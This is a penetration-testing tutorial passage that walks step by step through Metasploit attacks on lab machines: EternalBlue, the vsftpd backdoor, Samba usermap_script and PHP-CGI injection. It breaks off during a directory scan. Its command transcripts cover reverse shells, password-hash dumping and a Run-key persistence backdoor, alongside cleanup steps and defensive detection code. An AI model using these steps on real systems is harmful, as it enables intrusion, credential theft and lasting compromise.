Part 1: Hands-on walkthrough: attacking and defending against EternalBlue
1.1 Vulnerability background and core principle
Identifier: MS17-010 (CVE-2017-0144)
Affected: Windows Vista/7/8.1/10, Windows Server 2008/2012/2016 (Microsoft later shipped out-of-band fixes for the already unsupported XP and Server 2003 as well)
Type: remote code execution in the SMBv1 server
Severity: Critical (Microsoft's rating); NVD scores CVE-2017-0144 at 8.1 on CVSS v3
EternalBlue lives in the Windows SMBv1 server driver (srv.sys). By sending specially crafted SMB packets, an unauthenticated attacker corrupts the kernel pool and gains remote code execution in kernel context, i.e. full control of the machine. MS17-010 fixed a family of SMBv1 bugs (CVE-2017-0143 through CVE-2017-0148); CVE-2017-0144 is the one the EternalBlue exploit uses. The leaked exploit was the spreading mechanism of the 2017 WannaCry ransomware outbreak, which caused a global security crisis.
1.2 Setting up the lab, step by step
Attacker side:
bash
# 1. Attacker box (Kali Linux)
# Check the network configuration (ifconfig is deprecated on current Kali; "ip addr show eth0" does the same job)
ifconfig eth0
# In this lab the attacker's IP is 192.168.1.10
# 2. Install the tooling
sudo apt update
sudo apt install metasploit-framework -y
# 3. Start the Metasploit database
sudo systemctl start postgresql
sudo msfdb init
Target side:
Target: Windows 7 SP1 (x64)
Requirements:
- Windows Firewall disabled (or at least TCP 445 allowed in from the attacker)
- TCP port 445 reachable from the attacker
- Neither KB4012212 (the March 2017 security-only update) nor KB4012215 (the monthly rollup) installed; both contain the MS17-010 fix. Check on the target with "wmic qfe list" or Get-HotFix in PowerShell
- IP address: 192.168.1.100
Keep both machines on an isolated lab network (a host-only VM network, for example): the target is deliberately unpatched and exposes 445, and the exploit can crash it.
1.3 The attack flow in detail
Step 1: start msfconsole and search for the relevant modules
bash
# Start the console
msfconsole
# Search for MS17-010 modules
msf6 > search ms17_010
Matching Modules
================
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Three modules matter here (a current Metasploit lists a few more, such as auxiliary/admin/smb/ms17_010_command and the DoublePulsar modules):
- Module 0: the EternalBlue kernel-pool exploit itself
- Module 1: the scanner that checks whether a host is vulnerable without exploiting it
- Module 2: a psexec-style exploit built on the named-pipe variants (EternalRomance/EternalSynergy/EternalChampion). It needs access to a named pipe, which a null session often provides, and is far more stable than the pool grooming in module 0
Step 2: confirm the vulnerability with the scanner module
bash
# Select the scanner
msf6 > use auxiliary/scanner/smb/smb_ms17_010
# Show the module options
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      445              yes       The SMB service port (TCP)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   SMBDomain  .                no        (Optional) The Windows domain to use for authentication
   SMBPass                     no        (Optional) The password for the specified username
   SMBUser                     no        (Optional) The username to authenticate as
# Set the target
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
# Run the scan
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Reading the result:
- A "[+] ... Host is likely VULNERABLE to MS17-010!" line means the host answered the probe the way an unpatched system does (the exploit module runs the same check again in step 5 and prints the same line).
- A "[-] ... Host does NOT appear vulnerable" line means the fix is installed, or SMBv1 is disabled.
The scanner is a null-session probe: it asks the server to PeekNamedPipe on file ID 0 and looks at the NT status code in the reply. Unpatched hosts answer STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); patched hosts answer STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED. Unlike the exploit, the scanner is safe to run against production systems.
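The decision rule above is worth seeing at the byte level. The following is an added example written for this article, not Metasploit code: it builds the SMBv1 TRANS/PeekNamedPipe probe the scanner sends, decodes the SMB header of a reply and applies the same status-code classification. It assumes that SMBv1 negotiate, session setup and tree connect to IPC$ have already been done by other code (TID and UID are plain inputs), and the replies it classifies are constructed with make_reply(), not captured from a host.

```python
"""Protocol-level view of what auxiliary/scanner/smb/smb_ms17_010 checks.

Added example for this article, not Metasploit code. The scanner sends an
SMB_COM_TRANSACTION (0x25) carrying the TRANS_PEEK_NMPIPE (0x23) sub-command
against file ID 0 on a null-session IPC$ tree and classifies the NT status
in the reply:
  0xC0000205 STATUS_INSUFF_SERVER_RESOURCES -> unpatched, vulnerable
  0xC0000008 STATUS_INVALID_HANDLE          -> patched
  0xC0000022 STATUS_ACCESS_DENIED           -> patched
Assumption: negotiate, session setup and tree connect were already done by
other code, so TID/UID are inputs. make_reply() fabricates replies for the
demo; nothing here is a captured packet.
"""
import struct

SMB_COM_TRANSACTION = 0x25
TRANS_PEEK_NMPIPE = 0x0023
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
STATUS_INVALID_HANDLE = 0xC0000008
STATUS_ACCESS_DENIED = 0xC0000022

# SMBv1 header (32 bytes): protocol, command, status, flags, flags2, pid_high,
# security_features, reserved, tid, pid_low, uid, mid
SMB_HEADER = "<4sBIBHH8sHHHHH"
PIPE_NAME = b"\\PIPE\\\x00"


def netbios_frame(smb: bytes) -> bytes:
    """Prefix an SMB message with the 4-byte NetBIOS session header (type 0, 3-byte length)."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def build_peek_named_pipe_request(tid: int, uid: int, pid: int = 0xFEFF, mid: int = 0x40) -> bytes:
    """TRANS request: PeekNamedPipe on FID 0, the probe that elicits the telltale status."""
    # Offsets count from the start of the SMB header: 32-byte header,
    # 1-byte WordCount, 16 parameter words, 2-byte ByteCount, then the pipe name.
    param_off = data_off = 32 + 1 + 32 + 2 + len(PIPE_NAME)
    words = struct.pack(
        "<HHHHBBHIHHHHHBBHH",
        0, 0,                  # TotalParameterCount, TotalDataCount
        0xFFFF, 0xFFFF,        # MaxParameterCount, MaxDataCount
        0, 0,                  # MaxSetupCount, Reserved1
        0,                     # Flags
        0,                     # Timeout
        0,                     # Reserved2
        0, param_off,          # ParameterCount, ParameterOffset
        0, data_off,           # DataCount, DataOffset
        2, 0,                  # SetupCount, Reserved3
        TRANS_PEEK_NMPIPE, 0,  # Setup words: sub-command, FID 0 (a bogus handle)
    )
    header = struct.pack(SMB_HEADER, b"\xffSMB", SMB_COM_TRANSACTION, 0, 0x18, 0xC007,
                         0, b"\x00" * 8, 0, tid, pid, uid, mid)
    smb = header + bytes([16]) + words + struct.pack("<H", len(PIPE_NAME)) + PIPE_NAME
    return netbios_frame(smb)


def parse_smb_header(packet: bytes) -> dict:
    """Validate the NetBIOS framing and decode the 32-byte SMBv1 header."""
    if len(packet) < 36 or packet[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    if int.from_bytes(packet[1:4], "big") != len(packet) - 4:
        raise ValueError("NetBIOS length does not match payload")
    (proto, cmd, status, flags, flags2, pid_hi, _sec, _res,
     tid, pid_lo, uid, mid) = struct.unpack(SMB_HEADER, packet[4:36])
    if proto != b"\xffSMB":
        raise ValueError("not SMBv1 (SMB2/3 headers start with 0xFE 'SMB')")
    return {"command": cmd, "status": status, "flags": flags, "flags2": flags2,
            "tid": tid, "uid": uid, "pid": (pid_hi << 16) | pid_lo, "mid": mid}


def classify_ms17_010(reply: bytes) -> str:
    """Apply the scanner's decision rule to a TRANS reply."""
    hdr = parse_smb_header(reply)
    if hdr["command"] != SMB_COM_TRANSACTION:
        return "unexpected reply (command 0x%02X)" % hdr["command"]
    if hdr["status"] == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if hdr["status"] in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "NOT vulnerable"
    return "inconclusive (status 0x%08X)" % hdr["status"]


def make_reply(status: int, tid: int = 0x0800, uid: int = 0x0800) -> bytes:
    """Constructed minimal error reply (WordCount 0, ByteCount 0) carrying the given status."""
    header = struct.pack(SMB_HEADER, b"\xffSMB", SMB_COM_TRANSACTION, status, 0x98, 0xC007,
                         0, b"\x00" * 8, 0, tid, 0xFEFF, uid, 0x40)
    return netbios_frame(header + b"\x00" + b"\x00\x00")


if __name__ == "__main__":
    for s in (STATUS_INSUFF_SERVER_RESOURCES, STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        print("0x%08X -> %s" % (s, classify_ms17_010(make_reply(s))))
```

To use this against a real host you still need the SMBv1 negotiate, session setup and tree connect in front of it, which is exactly the sequence Metasploit's scanner and nmap's smb-vuln-ms17-010 script perform; the point here is that the verdict rests on a single NT status code, so a host with SMBv1 disabled never reaches this step and is reported as not vulnerable.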
Step 3: select the EternalBlue exploit module
bash
# Leave the scanner context
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
# Select the exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Show module details
msf6 exploit(windows/smb/ms17_010_eternalblue) > info
       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14
"Rank: Average" is a warning rather than a formality: the exploit grooms the non-paged kernel pool, and a failed attempt can blue-screen the target. Run it only against lab machines, or with explicit agreement that a crash is acceptable.
Step 4: configure the exploit
bash
# Show the options that must be set
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
# Set the target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
# List the compatible payloads
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom normal No Custom Payload
1 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
4 windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
# Pick the 64-bit Meterpreter reverse-TCP payload (the target is x64; a reverse shell also works through NAT and host firewalls where a bind shell would not)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
# Show the payload options that now need values
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
# Set the attacker's IP and listening port
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
Step 5: launch the exploit
bash
# Run it
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] 192.168.1.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.1.100:445 - Connecting to target for exploitation.
[+] 192.168.1.100:445 - Connection established for exploitation.
[+] 192.168.1.100:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.100:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.100:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.1.100:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.1.100:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.1.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.100:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.100:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.100:445 - Starting non-paged pool grooming
[+] 192.168.1.100:445 - Sending SMBv2 buffers
[+] 192.168.1.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.100:445 - Sending final SMBv2 buffers.
[*] 192.168.1.100:445 - Sending last fragment of exploit packet
[*] 192.168.1.100:445 - Receiving response from exploit packet
[+] 192.168.1.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.100:445 - Sending egg to corrupted connection.
[*] 192.168.1.100:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.100:49158) at 2023-10-01 10:00:00 +0800
[+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
What happened, in order:
- The reverse TCP handler starts on the attacker (192.168.1.10:4444)
- The module runs the smb_ms17_010 check and confirms the target looks vulnerable
- It connects over SMBv1 and matches the OS and architecture in the reply against the selected target (VERIFY_TARGET and VERIFY_ARCH)
- It sends all but the last fragment of the oversized transaction, then grooms the non-paged pool with SMBv2 buffers so that a free hole sits next to a controlled allocation
- Sending the last fragment triggers the kernel-pool overwrite; the 0xC000000D status in the reply is the expected response to the corrupted packet
- The "egg" (the stage loader) is sent over the corrupted connection and runs in kernel context when the buffer is freed
- Meterpreter's stage is delivered and a SYSTEM-level session opens
1.4 Working in the Meterpreter session
Once a Meterpreter session is open, the usual post-exploitation commands are available:
bash
# 1. System information
meterpreter > sysinfo
Computer : WIN7-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
# 2. Current privilege level (EternalBlue lands in kernel context, so the session is SYSTEM from the start; no privilege escalation is needed)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# 3. Process list
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
264 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
332 324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
384 376 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
... ... ... ... ... ... ...
# 4. Migrate into another process. This is about stability as much as stealth: the process the payload landed in may exit, whereas a long-lived SYSTEM process such as spoolsv.exe or winlogon.exe outlives it. Pick a PID from the ps output above (656 in this lab)
meterpreter > getpid
Current pid: 3724
meterpreter > migrate 656
[*] Migrating from 3724 to 656...
[*] Migration completed successfully.
# 5. Screenshot of the interactive desktop
meterpreter > screenshot
Screenshot saved to: /root/WjVfJmhT.jpeg
# View it on the attacker with: xdg-open /root/WjVfJmhT.jpeg
# 6. Dump the local account hashes from the SAM (needs SYSTEM; the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password, so these accounts have none set)
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# 7. Enable Remote Desktop (the post module also sets TermService to auto-start and opens the firewall port; keep the cleanup resource file it writes)
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20231001100000_default_192.168.1.100_host.windows.cle_123456.txt
1.5 Installing a persistent backdoor
bash
# 1. The persistence Meterpreter script installs an agent that starts on logon
meterpreter > run persistence -U -i 60 -p 4444 -r 192.168.1.10
[*] Running Persistence Script
[*] Resource file for cleanup created: /root/.msf4/logs/persistence/WIN7-PC_20231001.1000.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444
[*] Persistent agent script is 99627 bytes long
[+] Persistent Script written to C:\Windows\TEMP\default.exe
[*] Executing script C:\Windows\TEMP\default.exe
[+] Agent executed with PID 4084
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QfVhLzVlWXv
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QfVhLzVlWXv
Options:
- -U: start the agent when a user logs on (a Run key under HKLM)
- -i 60: retry the connection every 60 seconds
- -p 4444: port to connect back to
- -r 192.168.1.10: attacker IP to connect back to
Two caveats:
- The persistence script is a legacy Meterpreter script and is deprecated; recent Metasploit 6 releases refuse to run it and point to the local exploit module exploit/windows/local/persistence (options SESSION, STARTUP=USER|SYSTEM|SERVICE, DELAY, plus the usual payload, LHOST and LPORT), which writes the same kind of cleanup resource file.
- The artefacts are loud: an unsigned executable in a world-writable directory, a Run key with a random name, and an outbound connection attempt every 60 seconds. Any EDR, or a manual Autoruns review, finds this, which is why the cleanup section and the report matter on a real engagement.
1.6 Cleaning up
The cleanup resource file written in 1.5 undoes everything when replayed with the meterpreter resource command; the manual equivalent is:
bash
# 1. Look up what the autorun entry points at
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v QfVhLzVlWXv
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Name: QfVhLzVlWXv
Data: C:\Windows\TEMP\default.exe
# 2. Delete the registry value
meterpreter > reg deleteval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v QfVhLzVlWXv
[*] Deleted QfVhLzVlWXv from HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# 3. Delete the agent binary. Kill the running agent first (PID 4084 in the persistence output) with the meterpreter kill command, because Windows refuses to delete an executable that is in use
meterpreter > rm C:\\Windows\\TEMP\\default.exe
Removing the artefacts does not remove the evidence: the Run-key change, the process creation, the RDP change and the outbound connection attempts are all visible in Windows event logs and network telemetry, and a failed EternalBlue attempt leaves a kernel crash dump. On an engagement, document every artefact in the report rather than relying on cleanup.
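Seen from the defender's side, the persistence above is a textbook autorun finding. The following is an added example written for this article, not Metasploit or Microsoft code: it parses the text of a "reg export" of the Run keys and flags every value whose executable lives in a user-writable location such as C:\Windows\TEMP. The .reg sample is constructed to mirror the artefacts from 1.5 (plus one benign entry and one AppData entry as realistic noise); the directory lists used for the verdict are an assumption you should tune to your estate, and REG_EXPAND_SZ values (emitted as hex(2):...) are reported as unparsed rather than decoded.

```python
"""Hunt for the autorun persistence installed in section 1.5.

Added example for this article (not Metasploit or Microsoft code). Reads a
`reg export` of the Run keys and flags values whose executable launches from
a location an attacker can write to. SAMPLE_REG_EXPORT is constructed;
WRITABLE_DIRS / TRUSTED_DIRS are an assumed baseline, not a standard.
"""
import re
from typing import Dict, List

SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"QfVhLzVlWXv"="C:\\Windows\\TEMP\\default.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\User\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"""

AUTORUN_KEYS = (r"\microsoft\windows\currentversion\run",
                r"\microsoft\windows\currentversion\runonce")
# Directories an unprivileged user (or a dropper running as one) can write to.
WRITABLE_DIRS = ("\\temp\\", "\\tmp\\", "\\appdata\\", "\\users\\public\\",
                 "\\programdata\\", "\\downloads\\")
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")

_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
_EXE_RE = re.compile(r'^"?([^"]*?\.exe)"?', re.IGNORECASE)


def decode_reg_export(data: bytes) -> str:
    """reg export writes UTF-16LE with a BOM; hand-written .reg files are usually ASCII."""
    if data[:2] == b"\xff\xfe":
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


def _unescape(s: str) -> str:
    """Undo .reg escaping: \\" -> " and \\\\ -> \\ ."""
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key_path: {value_name: value}} with REG_SZ values decoded."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and (m := _VALUE_RE.match(line)):
            name, raw = _unescape(m.group(1)), m.group(2)
            if raw.startswith('"') and raw.endswith('"'):
                keys[current][name] = _unescape(raw[1:-1])
            else:
                keys[current][name] = "<unparsed: %s>" % raw[:12]
    return keys


def executable_of(command: str) -> str:
    """Pull the program path out of a Run value such as '"C:\\x\\a.exe" /flag'."""
    m = _EXE_RE.match(command.strip())
    return m.group(1) if m else command.strip().split(" ")[0]


def audit_run_keys(text: str) -> List[Dict[str, str]]:
    """List autorun entries that launch from writable or otherwise untrusted locations."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if not key.lower().endswith(AUTORUN_KEYS):
            continue
        for name, command in values.items():
            exe = executable_of(command)
            low = exe.lower()
            if any(d in low for d in WRITABLE_DIRS):
                reason = "launches from a user-writable directory"
            elif not low.startswith(TRUSTED_DIRS):
                reason = "launches from outside the usual program directories"
            else:
                continue
            findings.append({"key": key, "name": name, "exe": exe, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_run_keys(SAMPLE_REG_EXPORT):
        print("%s\\%s -> %s (%s)" % (f["key"], f["name"], f["exe"], f["reason"]))
```

The AppData hit for OneDrive is deliberate: legitimate per-user software also starts from user-writable paths, so the output is a triage list, not a verdict. Pair it with the other signals this tutorial leaves behind (a new executable in C:\Windows\TEMP, a process connecting out to the same port every 60 seconds) before calling it an incident.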
Part 2: Linux target: attacking Metasploitable 2
2.1 The target: Metasploitable 2
Metasploitable 2 is an intentionally vulnerable Ubuntu VM built for penetration-testing practice. Its services include:
- FTP (vsftpd 2.3.4)
- SSH (OpenSSH 4.7p1)
- Telnet
- SMTP
- HTTP (Apache 2.2.8)
- Samba (3.x)
- MySQL
- PostgreSQL
- and more
IP address in this lab: 192.168.1.150
Never expose it to a network you do not fully control: it can be rooted from several services without credentials.
2.2 Exploiting the vsftpd 2.3.4 backdoor
bash
# 1. Search for vsftpd modules
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes VSFTPD v2.3.4 Backdoor Command Execution
# 2. Select the exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
# 3. Show module information
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info
Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03
# 4. Show the options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
# 5. Set the target
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
# 6. Run the exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.150:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.150:21 - USER: 331 Please specify the password.
[+] 192.168.1.150:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.150:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.1.10:4444 -> 192.168.1.150:6200) at 2023-10-01 10:30:00 +0800
# 7. Confirm who we are (this is a raw command shell with no prompt)
whoami
root
pwd
/
ls -la
How the backdoor works:
In mid-2011 the vsftpd 2.3.4 tarball on the project's download site was replaced with a trojaned copy. If the FTP USER name contains the two characters ":)" (a smiley), the daemon forks a root shell listening on TCP port 6200; the module sends such a login, then connects to port 6200 and hands you that shell, which is why the session lists the target port as 6200. This is not a bug in vsftpd's protocol handling but code deliberately inserted by whoever compromised the download site; genuine vsftpd releases do not contain it, and the only fix is to run a clean build.
2.3 Exploiting the Samba "username map script" vulnerability
bash
# 1. Search for Samba modules
msf6 > search samba
# 2. Select the usermap_script exploit (CVE-2007-2447; Samba 3.0.20 through 3.0.25rc3)
msf6 > use exploit/multi/samba/usermap_script
# 3. Configure it
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
# 4. Run it
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Command shell session 3 opened (192.168.1.10:4444 -> 192.168.1.150:56728) at 2023-10-01 10:40:00 +0800
whoami
root
How it works: when smb.conf sets a "username map script", Samba hands the username supplied at authentication to that script through a shell without sanitising it. A username containing shell metacharacters (the module wraps its payload in backticks) therefore runs arbitrary commands as the smbd user, which on Metasploitable 2 is root. No credentials are needed because the injection happens during the authentication attempt itself. The fix is to upgrade past 3.0.25rc3 or simply not to use that option.
Part 3: Web application exploitation, case study
3.1 PHP CGI argument injection
bash
# 1. Select the PHP-CGI argument injection exploit (CVE-2012-1823). When PHP runs as a CGI binary, a query string such as
#    ?-d+allow_url_include=on+-d+auto_prepend_file=php://input is passed to php-cgi as command-line options, so the POST body is executed as PHP
msf6 > use exploit/multi/http/php_cgi_arg_injection
# 2. Configure it (TARGETURI must be a script that is actually served through php-cgi; /vulnerable.php is a lab placeholder)
msf6 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf6 exploit(multi/http/php_cgi_arg_injection) > set TARGETURI /vulnerable.php
TARGETURI => /vulnerable.php
msf6 exploit(multi/http/php_cgi_arg_injection) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
# 3. Run it
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Sending stage (39927 bytes) to 192.168.1.200
[*] Meterpreter session 4 opened (192.168.1.10:4444 -> 192.168.1.200:443) at 2023-10-01 11:00:00 +0800
meterpreter > sysinfo
Computer : webserver
OS : Linux webserver 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
Meterpreter : php/linux
3.2 Web directory brute-forcing
bash
# 1. Select dir_scanner
msf6 > use auxiliary/scanner/http/dir_scanner
# 2. Configure it
msf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.1.200
